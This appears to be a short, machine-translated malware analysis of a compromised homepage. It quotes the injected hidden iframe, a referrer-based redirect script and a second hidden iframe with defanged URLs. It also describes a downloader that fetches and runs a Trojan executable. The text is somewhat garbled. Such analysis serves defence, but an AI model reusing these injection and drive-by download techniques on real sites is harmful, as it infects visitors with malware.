EndurerOriginal
1Version
Insert the following code into the homepage:
/------------
<IFRAME src = "hxxp: // www. AC *** 66.cn/820.000000008/index.htm" width = "0" Height = "0" frameborder = "0"> </iframe>
------------/
Hxxp: // www. AC *** 66.cn/820.20.20.8/index.htmThe content is:
/--------
<Script language = "JavaScript">
Function camefrom (where ){
If (! Document. referrer &&! Where) return true;
Else return (document. referrer. indexof (where)> = 0)
}
If (camefrom ("nen.com.cn ")){
Location. Replace ("3721.htm ");
}
Else if (camefrom ("Gov ")){
Location. Replace ("3721.htm ");
}
Else if (camefrom ("or ")){
Location. Replace ("3721.htm ");
}
Else if (camefrom ("bi ")){
Location. Replace ("3721.htm ");
}
Else if (camefrom ("1488.com ")){
Location. Replace ("3721.htm ");
}
Else {
Location. Replace ("mm.htm ");
}
</SCRIPT>
--------/
Hxxp: // www. AC ***** 66.cn/8108000000008/mm.htmThe content is:
/--------
<IFRAME src = "hxxp: // www. AC *** 66.cn/820.000000008/joke.htm" width = "0" Height = "0" frameborder = "0"> </iframe>
<SCRIPT src = 'hxxp: // s ** 59.cnzz.com/stat.php? Id = 230393 & web_id = 230393 & show = PIC 'language = 'javascript 'charset = 'gb2312 '> </SCRIPT>
--------/
Hxxp: // www. AC *** 66.cn/8368000000008/joke.htmThe content is a Javascript script, because it contains the attacker's organization and QQ number, the specific content is not disclosed.
This script uses Microsoft. XMLHTTP and scripting. fileSystemObject download file hxxp: // www. AC *** 66.cn/820.00008/rpp.exe, save it as ld.com in the temporary ie folder, and use shell. the ShellExecute method of the Application object to run. (This is similar to the second script program of the Vikin/Viking worm that is carefully spread through the URL (Q-zone. ***** QQ. c0m) in the QQ tail)
G0ld.comKaspersky reportsTrojan-Downloader.Win32.Delf.asbThe rising report isTrojan. DL. Delf. CSH